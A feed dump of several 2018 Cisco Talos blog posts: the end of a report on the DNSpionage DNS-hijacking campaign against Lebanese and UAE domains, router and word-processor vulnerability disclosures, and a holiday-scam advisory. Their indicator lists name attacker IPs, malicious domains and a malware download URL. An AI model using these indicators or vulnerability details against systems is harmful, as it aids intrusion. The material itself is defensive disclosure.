DeltaHost.<br /><br />The last one was used in a DNS redirection attack between September and November. Multiple nameservers belonging to the public sector in Lebanon and UAE, as well as some companies in Lebanon, were apparently compromised, and hostnames under their control were pointed to attacker-controlled IP addresses. The attackers redirected the hostnames to the IP 185.20.187.8 for a short time. Just before redirecting the IP, the attackers created a certificate matching the domain name with the Let's Encrypt service.<br /><br />In this section, we will present all the DNS redirection instances we identified and the attacker-generated certificates associated with each. We don't know if the redirection attack was ultimately successful, or what exact purpose the DNS redirection served. However, the impact could be significant, as the attackers were able to intercept all traffic destined for these hostnames during this time. Because the attackers targeted email and VPN traffic specifically, they may have been used to harvest additional information, such as email and/or VPN credentials.<br /><br />As incoming email would also be arriving at the attackers' IP address, if there was multi-factor authentication, it would allow the attackers to obtain MFA codes to abuse. Since the attackers were able to access email, they could carry out additional attacks or even blackmail the target.<br /><br />The DNS redirection we identified occurs in multiple locations where there is no direct correlation of infrastructure, staff, or job routines. It also occurs in both the public and private sectors. Therefore, we believe it was not human error, nor a mistake by an administrative user within any of the impacted organisations. This was a deliberate, malicious attempt by the attackers to redirect DNS.<br /><br /><h3 id="h.60gximskz3tj">Lebanon government redirection</h3><br />Talos identified that the Finance Ministry of Lebanon's email domain was the victim of a malicious a DNS redirection.<br /><br /><ul><li>webmail.finance.gov.lb was redirected to 185.20.187.8 on Nov. 6 06:19:13 GMT. On the same date at 05:07:25 a <a href="https://crt.sh/?id=922787324">Let's Encrypt certificate</a> was created.</li></ul><h3 id="h.lcbzpycqanre">UAE government redirection</h3><br />UAE public domains were targeted, as well. We identified a domain from a law enforcement domain below (VPN and College) and the Telecommunication Regulatory Authority.<br /><br /><ul><li>adpvpn.adpolice.gov.ae redirected to 185.20.187.8 on Sept. 13 at 06:39:39 GMT. The same date at 05:37:54 a <a href="https://crt.sh/?id=741047630">Let's Encrypt certificate</a> was created.</li><li>mail.mgov.ae redirected to 185.20.187.8 on Sept. 15 at 07:17:51 GMT. A <a href="https://crt.sh/?id=804429558">Let's Encrypt certificate</a> was also created at 06:15:51 GMT.</li><li>mail.apc.gov.ae redirected to 185.20.187.8 on Sept. 24. A <a href="https://crt.sh/?id=820893483">Let's Encrypt certificate</a> was also created at 05:41:49 GMT.</li></ul><h3 id="h.9ijynb4emvti">Middle East Airline redirection</h3><br />Talos discovered that Middle East Airlines (MEA), a Lebanese airline, was also the victim of DNS redirection.<br /><br /><ul><li>memail.mea.com.lb redirected to 185.20.187.8 on Nov. 14 at 11:58:36 GMT<br />On Nov. 6, at 10:35:10 GMT, a <a href="https://crt.sh/?id=923463031">Let's Encrypt certificate</a> was created.</li></ul><br /><br />This certificate contains alternative names in the subject lines, this is a feature with DNS to allow for multiple domains to be added to the certificate for SSL activities:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-5x-QPlYuA3s/W_0_XMqAk9I/AAAAAAAAAl4/nBvAZ9V8Tr0-8RutKGWfPKo2a2eLoUFgQCLcBGAs/s1600/image9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1077" data-original-width="754" height="640" src="https://1.bp.blogspot.com/-5x-QPlYuA3s/W_0_XMqAk9I/AAAAAAAAAl4/nBvAZ9V8Tr0-8RutKGWfPKo2a2eLoUFgQCLcBGAs/s640/image9.png" width="448" /></a></div><ul><li>memail.mea.com.lb</li><li>autodiscover.mea.com.lb</li><li>owa.mea.com.lb</li><li>www.mea.com.lb</li><li>autodiscover.mea.aero</li><li>autodiscover.meacorp.com.lb</li><li>mea.aero</li><li>meacorp.com.lb</li><li>memailfr.meacorp.com.lb</li><li>meoutlook.meacorp.com.lb</li><li>tmec.mea.com.lb</li></ul><br />These domains show a clear understanding of the victims' domains, leads us to believe the attacker was active in these environments to understand the specific domains and certificates they would be required to produce.<br /><br /><h2 id="h.uc73snt7y6xd">Conclusion</h2><br />Our investigation discovered two events: the DNSpionage malware and a DNS redirection campaign. In the case of the malware campaign, we don't know the exact target, but we do know the attackers went after users in Lebanon and the UAE. However, as outlined above, we were able to uncover the targets of the redirect campaign.<br /><br />We are highly confident that both of these campaigns came from the same actor. However, we do not know much about the location of the actors and their exact motivations. It is clear that this threat actor was able to redirect DNS from government-owned domains in two different countries over the course of two months, as well as a national Lebanese airline. They were able to work from the system's point of view by using a Windows malware, as well as the network, by using DNS exfiltration and redirection. It is unclear if these DNS redirection attacks were successful, but the attackers have kept up their efforts, launching five attacks so far this year, including one in the past two weeks.<br /><br />Users should use these campaigns as proof that their endpoint protection as well as the network protection need to be as strong as possible. This is an advanced actor who obviously has their sights set on some important targets, and they don't appear to be letting up any time soon.<br /><br /><h2 id="h.6i86xkbp2smh">Coverage</h2>Snort rules <a href="https://snort.org/advisories/talos-rules-2018-11-27">48444 and 48445</a> will prevent DNSpionage from making an outbound connection.<br /><br />Additional ways our customers can detect and block this threat are listed below.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-N1jJRgJhAQU/W_0_bTqCIFI/AAAAAAAAAl8/_nJOzRUz-G8yx0oI62Xq0v_kw6SiBgfbQCLcBGAs/s1600/image4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="268" data-original-width="320" src="https://4.bp.blogspot.com/-N1jJRgJhAQU/W_0_bTqCIFI/AAAAAAAAAl8/_nJOzRUz-G8yx0oI62Xq0v_kw6SiBgfbQCLcBGAs/s1600/image4.png" /></a></div><br />Advanced Malware Protection (<a href="https://www.cisco.com/c/en/us/products/security/advanced-malware-protection">AMP</a>) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br />Cisco Cloud Web Security (<a href="https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html">CWS</a>) or<a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html"> </a><a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html">Web Security Appliance (WSA</a>) web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br /><a href="https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html">Email Security</a> can block malicious emails sent by threat actors as part of their campaign.<br /><br />Network Security appliances such as<a href="https://www.cisco.com/c/en/us/products/security/firewalls/index.html"> </a><a href="https://www.cisco.com/c/en/us/products/security/firewalls/index.html">Next-Generation Firewall (NGFW</a>),<a href="https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html"> Next-Generation Intrusion Prevention System (NGIPS</a>), and<a href="https://meraki.cisco.com/products/appliances"> Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><a href="https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html">AMP Threat Grid</a> helps identify malicious binaries and build protection into all Cisco Security products.<br /><br /><a href="https://umbrella.cisco.com/">Umbrella</a>, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.<br /><br />Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href="https://www.snort.org/products">Snort.org</a>.<br /><br /><h2 id="h.57ejqrrdgqmm">Indicators of Compromise (IOCs)</h2><br />The following IOCs are associated with various malware distribution campaigns that were observed during the analysis of associated malicious activity.<br /><br /><h3 id="h.mxzvx38g7gwa">Fake job websites:</h3><br />hr-wipro[.]com<br />hr-suncor[.]com<br /><br /><h3 id="h.fycj5g4k8a6z">Malicious documents:</h3><br />9ea577a4b3faaf04a3bddbfcb934c9752bed0d0fc579f2152751c5f6923f7e14 (LB submit)<br />15fe5dbcd31be15f98aa9ba18755ee6264a26f5ea0877730b00ca0646d0f25fa (LB submit)<br /><br /><h3 id="h.j2lfoys8jlkb">DNSpionage samples:</h3><br />2010f38ef300be4349e7bc287e720b1ecec678cacbf0ea0556bcf765f6e073ec 82285b6743cc5e3545d8e67740a4d04c5aed138d9f31d7c16bd11188a2042969<br />45a9edb24d4174592c69d9d37a534a518fbe2a88d3817fc0cc739e455883b8ff<br /><br /><h3 id="h.1x5r6rlex94s">C2 Server IPs:</h3><br />185.20.184.138<br />185.20.187.8<br />185.161.211.72<br /><br /><h3 id="h.tlh9ipkmy2fa">C2 Server Domains:</h3><br />0ffice36o[.]com<br /><br /><h3 id="h.fnq2sipf26us">DNS Hijack Domains (pointed to 185.20.187.8):</h3><br />2018-11-14 : memail.mea.com.lb<br />2018-11-06 : webmail.finance.gov.lb<br />2018-09-24 : mail.apc.gov.ae<br />2018-09-15 : mail.mgov.ae<br />2018-09-13 : adpvpn.adpolice.gov.ae<br /><br /><h3 id="h.ga17stk6o3qb">Domains in the MEA certificate (on 185.20.187.8):</h3><br />memail.mea.com.lb<br />autodiscover.mea.com.lb<br />owa.mea.com.lb<br />www.mea.com.lb<br />autodiscover.mea.aero<br />autodiscover.meacorp.com.lb<br />mea.aero<br />meacorp.com.lb<br />memailr.meacorp.com.lb<br />meoutlook.meacorp.com.lb<br />tmec.mea.com.lb</div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/CD6ENIVNHU4" height="1" width="1" alt=""/>2018-11-29T12:47:20.755-05:000https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.htmlBeers with Talos EP42: To the Moon, Everyone!http://feedproxy.google.com/~r/feedburner/Talos/~3/jTwit8XyLhY/beers-with-talos-ep42-to-moon-everyone.htmlbeers with talosBlack FridayCyber Mondaymoonshotpodcastnoreply@blogger.com (Mitch Neff)Wed, 21 Nov 2018 12:19:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-3805186347558632211<div dir="ltr" style="text-align: left;" trbidi="on"><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-VO1MwKSiMRM/WUBDawHg2eI/AAAAAAAAAIU/lz_fWXn3B7YnoXCcqaHFQpgkXSaMpvi3QCPcBGAYYCw/s1600/facebook_timeline_podcast.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="630" data-original-width="1200" height="336" src="https://4.bp.blogspot.com/-VO1MwKSiMRM/WUBDawHg2eI/AAAAAAAAAIU/lz_fWXn3B7YnoXCcqaHFQpgkXSaMpvi3QCPcBGAYYCw/s640/facebook_timeline_podcast.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-syTSjAlQ2EU/Wnn7oGQRmrI/AAAAAAAAAMg/vMFSk35zsngnKM3izSOla6RSmylI07__QCLcBGAs/s1600/BWT_EP22_MattBubble.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br class="Apple-interchange-newline" /></a></div>Beers with Talos (BWT) Podcast Ep. #42 is now available. Download this episode and subscribe to Beers with Talos:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410" target="_blank"><img border="0" data-original-height="45" data-original-width="160" src="https://4.bp.blogspot.com/-WLkU01IRCLw/WaWCg3YHpRI/AAAAAAAAAJA/nQ2rFarDFeAUBY4ncARRUVaNkMpBKC0KgCLcBGAs/s1600/itunes_button.png" /></a><a href="https://play.google.com/music/listen?u=0#/ps/Ikcmodkhrjtblk5yks47s5uqbca" target="_blank"><img border="0" data-original-height="45" data-original-width="160" src="https://2.bp.blogspot.com/-E-RSSZ9jbUY/WaWCkLGZnZI/AAAAAAAAAJE/Ciiz-Si4oA0cgR9tMGSGbT9336qrYuDeACLcBGAs/s1600/google_play_button.png" /></a><a href="https://www.stitcher.com/podcast/talos/beers-with-talos" target="_blank"><img border="0" data-original-height="45" data-original-width="160" src="https://1.bp.blogspot.com/-HIihRfTvh8I/WedjsKBFNhI/AAAAAAAAAKk/TCPBZoIkYdcW8QJujRtxxwjr70x4drh_wCEwYBhgL/s1600/stitcher_button.png" /></a></div><br />If iTunes and Google Play aren't your thing, click&nbsp;<a href="http://www.talosintelligence.com/podcast">here</a>.<br /><h3></h3><h3>Ep. #42 show notes:&nbsp;</h3>Recorded Nov. 16, 2018.<br /><br />Cyber moonshot, baby! It’s just like that time the U.S. raced everyone to the moon, except completely different and in no way related! Do we need a “cyber moonshot?” Is the plan that was just released the way to get there? ...and holy crap if Craig didn’t actually prepare for this podcast with notes and everything. <br /><br />We hope that you enjoy our rants over the Thanksgiving holiday break (for our American friends) or just at work like usual for the rest of you that don’t have a four day weekend ahead. We are genuinely grateful for you, listeners, as the entire reason that we get to keep doing this podcast. We enjoy having fun spreading the word on security and calling out excellence where we find it.<br /><h3><a name='more'></a>The timeline:</h3><div><div><h4>The topics</h4>01:00 - Roundtable - Hi, Ellen. Enjoy your swag. Also, transition programs for vets we are supporting<br />12:26 - The Cyber Moonshot! That’s really all we talk about the whole hour. I know we mentioned other topics, but we just ranted way too long on the first topic.<br />1:00:19 - Closing thoughts and parting shots<br /><h4>The links</h4><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"></div><span style="font-family: &quot;arial&quot;; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;"><a href="https://www.dhs.gov/sites/default/files/publications/DRAFT_NSTAC_ReportToThePresidentOnACybersecurityMoonshot_508c.pdf" target="_blank">Cyber Moonshot draft report (public link)</a></span></div><div><br /></div><div>==========</div><div><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><br />Featuring:&nbsp;<a href="https://twitter.com/security_craig">Craig Williams</a>&nbsp;(@Security_Craig),&nbsp;<a href="https://twitter.com/JoelEsler">Joel Esler</a>&nbsp;(@JoelEsler),&nbsp;<a href="https://twitter.com/kpyke">Matt Olney</a>&nbsp;(@kpyke) and&nbsp;<a href="https://twitter.com/EnglishLFC">Nigel Houghton</a>&nbsp;(@EnglishLFC).<br />Hosted by&nbsp;<a href="https://twitter.com/MitchNeff">Mitch Neff</a>&nbsp;(@MitchNeff).<br />Find all episodes&nbsp;<a href="http://cs.co/talospodcast">here</a>.<br /><br /><a href="http://cs.co/talositunes">Subscribe via iTunes</a>&nbsp;(and leave a review!)<br /><br />Check out the&nbsp;<a href="http://cs.co/talosresearch">Talos Threat Research Blog</a><br /><br />Subscribe to the&nbsp;<a href="http://cs.co/talosupdate">Threat Source newsletter</a><br /><br />Follow&nbsp;<a href="http://cs.co/talostwitter">Talos on Twitter</a><br /><br />Give us your feedback and suggestions for topics:<br /><a href="mailto:beerswithtalos@cisco.com">beerswithtalos@cisco.com</a></div></div></div></div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/jTwit8XyLhY" height="1" width="1" alt=""/>2018-11-21T19:09:14.119-05:000https://blog.talosintelligence.com/2018/11/beers-with-talos-ep42-to-moon-everyone.htmlVulnerability Spotlight: Multiple remote code execution vulnerabilities in Atlantis Word Processorhttp://feedproxy.google.com/~r/feedburner/Talos/~3/nTzI-vDPrp0/Atlantis-Word-Processor-RCE-vulns.htmlAtlantisAtlantis Word Processorremote code executionvuln devvulnerabilitiesnoreply@blogger.com (Jonathan Munshaw)Tue, 20 Nov 2018 07:35:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-5270947630146892011<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-P8KhgoWhlIU/XBKug9FQhtI/AAAAAAAAABA/f82RweNOqB8M4Nm-MFusv6czQrmRCygvACPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_vuln%2Bspotlight.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="1001" src="https://4.bp.blogspot.com/-P8KhgoWhlIU/XBKug9FQhtI/AAAAAAAAABA/f82RweNOqB8M4Nm-MFusv6czQrmRCygvACPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_vuln%2Bspotlight.jpg" /></a></div><i><br /></i><i>A member of Cisco Talos discovered these vulnerabilities.</i><br /><h2 style="text-align: left;">Executive summary</h2>Today, Cisco Talos is disclosing three remote code execution vulnerabilities in the Atlantis Word Processor. Atlantis Word Processor is a traditional word processor that provides a number of basic features for users, in line with what is in other similar types of software. This application is written in Delphi and keeps the majority of its capabilities in a single, relocatable binary. An attacker could exploit these vulnerabilities to corrupt the memory of the application, which can result in remote code execution under the context of the application.<br /><br />In accordance with our coordinated disclosure policy, Cisco Talos worked with Atlantis to ensure that these issues are resolved and that <a href="https://www.atlantiswordprocessor.com/en/downloads.htm">an update</a> is available for affected customers.<br /><br /><a name='more'></a><br /><h2 style="text-align: left;">Vulnerability details</h2><b>Atlantis Word Processor open document format NewAnsiString length remote code execution vulnerability (TALOS-2018-0711/CVE-2018-4038)</b><br /><br />The word processor contains an exploitable arbitrary write vulnerability in the open document format parser while trying to null-terminate a string. A specially crafted document could allow an attacker to pass an untrusted value as a length to a constructor, which miscalculates a length and then uses it to calculate the position to write a null byte. This particular bug lies in the `NewAnsiString` function.<br /><br />For more information on this vulnerability, read the full advisory <a href="http://www.talosintelligence.com/reports/TALOS-2018-0711">here</a>.<br /><br /><b>Atlantis Word Processor Huffman table code length remote code execution vulnerability (TALOS-2018-0712/CVE-2018-4039)</b><br /><br />Atlantis Word Processor contains an out-of-bounds write vulnerability in its PNG implementation. When opening a specially crafted document, which would need to be supplied by an attacker, the application fingerprints it in order to determine the correct file format parser. Eventually, an attacker could corrupt memory, which would allow them to execute arbitrary code in the context of the application. A user only needs to open the document to trigger this vulnerability.<br /><br />For more information on this vulnerability, read the full advisory <a href="http://www.talosintelligence.com/reports/TALOS-2018-0712">here</a>.<br /><br /><b>Atlantis Word Processor rich text format uninitialized TAutoList remote code execution vulnerability (TALOS-2018-0713/CVE-2018-4040)</b><br /><br />An exploitable uninitialized pointer vulnerability exists in the rich text format parser of Atlantis Word Procesor. A specially crafted document can cause certain RTF tokens to dereference an uninitialized pointer and then write to it. When opening up an RTF document, the application will first fingerprint it in order to determine the correct file format parser. Eventually, this would corrupt the memory of the application, allowing a user to execute code in the context of the application.<br /><br />For more information on this vulnerability, read the full advisory <a href="http://www.talosintelligence.com/reports/TALOS-2018-0713">here</a>.<br /><br /><h2 style="text-align: left;">Versions tested</h2>Talos tested and confirmed that Atlantis Word Processor, version 3.2.7.2 is affected by these vulnerabilities.<br /><br /><h2 style="text-align: left;">Conclusion</h2>All three of these vulnerabilities are triggered by the user opening a malicious, specially crafted document. The easiest way to avoid these issues is for the user to ensure that they don’t open any documents from untrusted sources. The <a href="https://www.atlantiswordprocessor.com/en/downloads.htm">latest update</a> from Atlantis will also cover these vulnerabilities, as will the Snort rules listed below.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://www.atlantiswordprocessor.com/en/downloads.htm"><img border="0" data-original-height="251" data-original-width="1250" height="128" src="https://4.bp.blogspot.com/-88IoUK8efak/W_QN7sl_GMI/AAAAAAAAEp0/WAMOgXu72FIyWFHnvNVTBV6WQSjRMdm5ACLcBGAs/s640/patch_availability_available.jpg" width="640" /></a></div><br /><h2 style="text-align: left;">Coverage</h2>The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.<br /><br />Snort Rules: <a href="https://snort.org/advisories/652">48385, 48386, 48389 - 48392</a><br /><div><br /></div></div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/nTzI-vDPrp0" height="1" width="1" alt=""/>2018-12-13T14:47:38.302-05:000https://blog.talosintelligence.com/2018/11/Atlantis-Word-Processor-RCE-vulns.htmlWhat scams shoppers should look out for on Black Friday and Cyber Mondayhttp://feedproxy.google.com/~r/feedburner/Talos/~3/I_PPrec4k5Q/what-scams-shoppers-should-look-out-for.htmlBlack FridayCyber Mondayemailholidayphishingshoppingspear phishingnoreply@blogger.com (Jonathan Munshaw)Mon, 19 Nov 2018 12:28:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-8755441525370080831<div dir="ltr" style="text-align: left;" trbidi="on">Every year, more and more Americans are taking care of their holiday shopping on Cyber Monday.<br /><br />Last year, consumers spent a record $6.59 billion during the annual online shopping day, an all-time record, according to <a href="https://news.adobe.com/press-release/experience-cloud/adobe-data-shows-cyber-monday-largest-online-sales-day-history-659">Adobe Insights</a>. Still, that doesn’t mean no one is rushing out the night of Thanksgiving to do their shopping. Shoppers still went out in droves on Black Friday last year — Adobe estimated that Americans spent $2.43 billion on Nov. 25, 2017.<br /><br /><a name='more'></a>These two frenzied days open the door for bad actors to take advantage, hoping to trick uneducated consumers into clicking on malicious ads (a.k.a. malvertising) and emails disguised as shopping deals to phish credit card and personal information. Last year, 71 percent of emails that mentioned either “Black Friday” or “Cyber Monday” by name were classified as spam by Cisco Talos. Of that spam, 96 percent of the emails came from uncommon top-level domains (TLDs) such as .top, .stream, .trade and .bid.<br /><br />One of the most prevalent domains associated with these emails is hxxp://bags-black-friday[.]top, which utilized the <a href="https://umbrella.cisco.com/blog/2016/12/19/in-the-eye-of-hailstorm/">“hailstorm”</a> method. This means that the attacker registered many domains and use them to send hundreds of spam emails in a matter of minutes, only to never use those domains again. Since those domains have no history in detection software, they can easily blow by security systems and land in users’ inboxes. The Cisco Umbrella data for bags-black-friday is below.<br /><br /><span id="docs-internal-guid-6d66d640-7fff-2058-3103-75b88fbeb5c9"><span style="font-family: &quot;arial&quot;; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="248" src="https://lh4.googleusercontent.com/BZF1jED_oAYj90VS7iHIJD1h4zjxJJJ22vcLxMkh3p4wrmn9jsd9Fp-_a2lPxUWppF05h4jMyNQwA5KHO-8jSbnScmZ1m_638_GjxkXYwoYoG5eKFKCbZnFyfWm_7fKRKONPZAW3" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></span><br /><br />Based on last year’s metrics, Talos believes that there will be a similar spike in these kinds of emails after the holiday shopping season kicks off.<br /><br />Talos has also seen several malicious sites hoping to capitalize on Black Friday and Cyber Monday. We have blacklisted several sites that contain either “Black Friday” or “Cyber Monday” directly in the URL name, indicating that attackers are hoping to draw customers in who are looking for deals specific to those shopping days. A complete list of these domains is in the “IOCs” section below.<br /><br />Some of these URLs reference popular stores that often run sales, such as J.C. Penney and Pandora jewelry. There are several other malicious URLs that mention these holidays but have been inactive for an extended period of time as of Nov. 14. As we get closer to Thanksgiving, we anticipate that the number of URLs targeted at shoppers will rise, as well. It is typical of attackers to set up these malicious sites just as the shopping days are arriving, hoping to show up in internet searches and bypass the usual detection, as with the email campaigns mentioned above.<br /><br />There are also specific malware attacks that have tried to capitalize on these “holidays.” For example, Microsoft discovered a malware campaign in 2016 that <a href="https://cloudblogs.microsoft.com/microsoftsecure/2016/11/23/dont-let-this-black-friday-cyber-monday-spam-deliver-locky-ransomware-to-you/">disguised itself as a special deal</a> from online retailer Amazon that downloaded the Locky ransomware onto victim’s machines. Locky is a ransomware that’s been spread for years, <a href="https://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html">mainly through email campaigns</a>. Once launched, the malware will encrypt users’ files and ask for a payment in order to return the files. However, the threat of Locky has largely been wiped out by antivirus detection engines over the past year. (If you happen to be infected with Locky, we have an open-source decryptor <a href="https://www.talosintelligence.com/lockydump">here</a> called “LockyDump” that can help you recover your files.)<br /><br />With these numbers in mind, Talos recommends that shoppers take the following advice when planning to shop on Black Friday and Cyber Monday to protect themselves from common scams:<br /><br /><ul style="text-align: left;"><li>Ensure that you are only downloading apps from trusted and official app stores like the Google Play store and iOS App Store.&nbsp;</li><li>Look out for apps that ask for suspicious permissions, such as access to your text messages, contacts, stored passwords and administrative features.</li><li>Some malicious apps will try to masquerade as a legitimate version of the one you could be searching for. Signs of these apps include poor spelling and grammar in app descriptions and interfaces, lack of high-quality performance and a developer contact that uses a free email service (such as @gmail.com).</li><li>Avoid clicking on unsolicited emails. Make sure that you purposely subscribed to any marketing emails you are receiving from retailers.</li><li>Do not click on any files from untrusted sources. These often contain files that will execute unwanted programs on your machine.</li><li>Use an ad blocker locally on your browser. These will often block any malvertising campaigns that aim to capitalize on shoppers looking for deals.</li><li>Try to use payment services such as Google Pay, Samsung Pay and Apple Pay. These services use tokenization instead of the “Primary Account Number” (your credit card number), making your transaction more secure.</li><li>Use complex passwords that are unique, per site. Attackers commonly reuse passwords as a way to compromise multiple accounts with the same username.</li><li>If a deal sounds too good to be true, it probably is.</li></ul><br />Our customers can detect and block these kinds of threats, as well, through a variety of our products.<br /><br /><b>IOCs</b><br /><br />americanas-seguranca-blackfriday[.]oni[.]cc<br />blackfriday-deal-uk[.]com<br />blackfriday-shoping[.]com<br />blackfriday-uk-deal[.]com<br />blackfridaydiscountmuch[.]com<br />blackfridayonlineshoping[.]com<br />blackfridaysofasale[.]com<br />centralatendimento-2016-blackfriday[.]com[.]br[.]fewori20.mobi<br />discount-blackfriday[.]shop<br />discountblackfriday[.]shop<br />downloadfileshere[.]com/get/odelldaigneault.nm.ru_black-friday_Downloader_8911010.exe<br />jcpenney[.]black[.]friday[.]sales[.]cybersmondaydeals.com<br />mariiusblog[.]blogspot[.]com/search/label/reduceri%20black%20friday%202014<br />pandora-blackfriday-deal[.]com<br />ricardoeletro-blackfriday[.]com[.]br[.]dosd23-0[.]mobi<br />sale-blackfriday[.]shop<br />saleblackfriday[.]shop<br />shopblackfriday[.]shop<br />ssl-dados-blackfriday-ricardoeletro[.]com[.]br[.]dsdkowie0930[.]net/produtos/32882479/PlayStation-3-250GB-HD-Controle-Dual-Shock-3-Preto-Sem-Fio-Produto-Oficial-Sony-Compacto-03-Super-Jogos<br />Uk-blackfriday[.]com<br />jcpenney[.]black[.]friday[.]sales[.]cybersmondaydeals[.]com<br /><div><br /></div></div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/I_PPrec4k5Q" height="1" width="1" alt=""/>2018-11-20T09:37:01.970-05:000https://blog.talosintelligence.com/2018/11/what-scams-shoppers-should-look-out-for.htmlVulnerability Spotlight: Multiple remote vulnerabilities in TP-Link TL-R600VPNhttp://feedproxy.google.com/~r/feedburner/Talos/~3/Fl3lfhKMbXM/tplinkr600.htmltp-linktplinkvulnerabilitiesVulnerabilityvulnerability spotlightnoreply@blogger.com (Vitor Ventura)Mon, 19 Nov 2018 06:30:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-2297505217237395249<div dir="ltr" style="text-align: left;" trbidi="on"><i></i><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-P8KhgoWhlIU/XBKug9FQhtI/AAAAAAAAABA/f82RweNOqB8M4Nm-MFusv6czQrmRCygvACPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_vuln%2Bspotlight.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="1001" src="https://4.bp.blogspot.com/-P8KhgoWhlIU/XBKug9FQhtI/AAAAAAAAABA/f82RweNOqB8M4Nm-MFusv6czQrmRCygvACPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_vuln%2Bspotlight.jpg" /></a></div><i><br /></i><i>Vulnerabilities discovered by Carl Hurd and Jared Rittle of Cisco Talos.</i><br /><br />Cisco Talos is disclosing multiple vulnerabilities in the TP-Link TL-R600VPN router. TP-Link produces a number of different types of small and home office (SOHO) routers. Talos discovered several bugs in this particular router model that could lead to remote code execution.<br /><br /><h2>Overview</h2><br />There are two root causes of the vulnerabilities: a lack of input sanitisation and parsing errors. The lack of proper input sanitisation leads the vulnerabilities TALOS-2018-0617/18, which can be exploited without authentication. Parsing errors are responsible for the vulnerabilities TALOS-2018-0619/20. However, these can only be exploited with an authenticated session. The remote code execution is done under the context of HTTPD However, since the HTTPD process is running under root, an attacker can run code with elevated privileges.<br /><br />All vulnerabilities were found on HWv3 FRNv1.3.0 and HWv2 FRNv1.2.3, except for TALOS 2018-0620, which was found only on HWv3 FRNv1.3.0.<br /><br /><a name='more'></a><h3>TALOS-2018-0617 — TP-Link TL-R600VPN HTTP denial of service</h3><br />An exploitable denial-of-service vulnerability exists in the URI-parsing function of the TP-Link TL-R600VPN HTTP server. If a directory traversal is attempted on any of the vulnerable pages (help, images, frames, dynaform, localization) and the requested page is a directory instead of a file, the web server will enter an infinite loop, making the management portal unavailable. This request doesn't need to be authenticated.<br /><br />CVE: CVE-2018-3948<br /><br />A full technical advisory is available <a href="https://talosintelligence.com/vulnerability_reports/TALOS-2018-0617">here</a>.<br /><br /><h3>TALOS-2018-0618 — TP-Link TL-R600VPN HTTP server information disclosure</h3><br />An exploitable information disclosure vulnerability exists in the HTTP server functionality of the TP-Link TL-R600VPN. A directory traversal vulnerability exists in the TP-Link TL-R600VPN in both authenticated and unauthenticated forms. If a standard directory traversal is used with a base page of 'help,' the traversal does not require authentication and can read any file on the system.<br /><br />CVE: CVE-2018-3949<br /><br />A full technical advisory is available <a href="https://talosintelligence.com/vulnerability_reports/TALOS-2018-0618">here</a>.<br /><br /><h3>TALOS-2018-0619 — TP-Link TL-R600VPN HTTP server ping address remote code execution</h3><br />An exploitable remote code execution vulnerability exists in the ping and traceroute functions of the TP-Link TL-R600VPN HTTP server. The router does not check the size of the data passed to its 'ping_addr' field when performing a ping operation. By sending a large amount of data to this field, an attacker could cause a stack-based buffer overflow, leading to remote code execution or a simple crash of the device's HTTP server. An attacker would need to be in an authenticated session to trigger this vulnerability.<br /><br />CVE: CVE-2018-3950<br /><br />A full technical advisory is available <a href="https://talosintelligence.com/vulnerability_reports/TALOS-2018-0619">here</a>.<br /><br /><h3>TALOS-2018-0620 — TP-Link TL-R600VPN HTTP server fs directory remote code execution</h3><br />An exploitable remote code execution vulnerability exists in the HTTP header-parsing function of the TP-Link TL-R600VPN HTTP server. A specially crafted HTTP request can cause a buffer overflow, resulting in remote 